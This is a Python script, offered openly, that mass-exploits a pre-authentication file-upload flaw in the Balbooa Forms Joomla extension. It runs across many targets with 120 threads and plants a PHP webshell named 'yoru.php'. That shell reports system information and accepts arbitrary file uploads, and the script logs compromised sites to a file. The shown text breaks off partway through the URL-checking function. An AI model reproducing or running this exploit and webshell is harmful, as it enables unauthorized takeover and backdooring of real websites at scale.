#!/usr/bin/env python3 """ CVE-2026-56291 — Balbooa Forms Joomla Mass RCE Exploit CVSS 9.8 | Pre-Auth | form.uploadAttachmentFile → PHP Upload Interactive Mass Exploiter — Uploads Custom Webshell Author: Yoru (يورو) [t.me/ChiefYoru] """ import requests import sys import os import time import random import re import hashlib import threading from concurrent.futures import ThreadPoolExecutor, as_completed from urllib.parse import urljoin import urllib3 from colorama import init, Fore, Back, Style init(autoreset=True) urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def show_banner(): os.system("cls" if os.name == "nt" else "clear") print(f""" ╻ ╻┏━┓┏━┓╻ ╻ ┗┳┛┃ ┃┣┳┛┃ ┃ {Fore.YELLOW}Author:{Style.RESET_ALL} Yoru (يورو) [{Fore.GREEN}t.me/ChiefYoru{Style.RESET_ALL}] ╹ ┗━┛╹┗╸┗━┛ --| Telegram: ({Fore.GREEN}t.me/ChiefYoru_PoCs{Style.RESET_ALL}) |--\n""") TIMEOUT = 15 THREADS = 120 SHELL_NAME = "yoru.php" OUTPUT_FILE = "shells.txt" MARKER = 'Yoru (يورو)
'

SHELL_CODE = '''Yoru (يورو) 
'.php_uname()."\n".'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'OK';}else{echo 'ER';}}?>''' UPLOAD_DIRS = ["/images/baforms/uploads/form-{fid}/", "/images/baforms/uploads/form-0/", "/images/baforms/uploads/"] FORM_IDS = list(range(1, 11)) _lock = threading.Lock() _hits = 0 _fails = 0 _done = 0 _total = 0 def rand_str(n=8): return hashlib.sha256(os.urandom(16)).hexdigest()[:n] def make_session(): s = requests.Session() s.headers.update({"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}) s.verify = False return s def check_url(s, url): try: r = s.get(url, timeout=TIMEOUT, allow_redirects=True) if MARKER in r.text: if "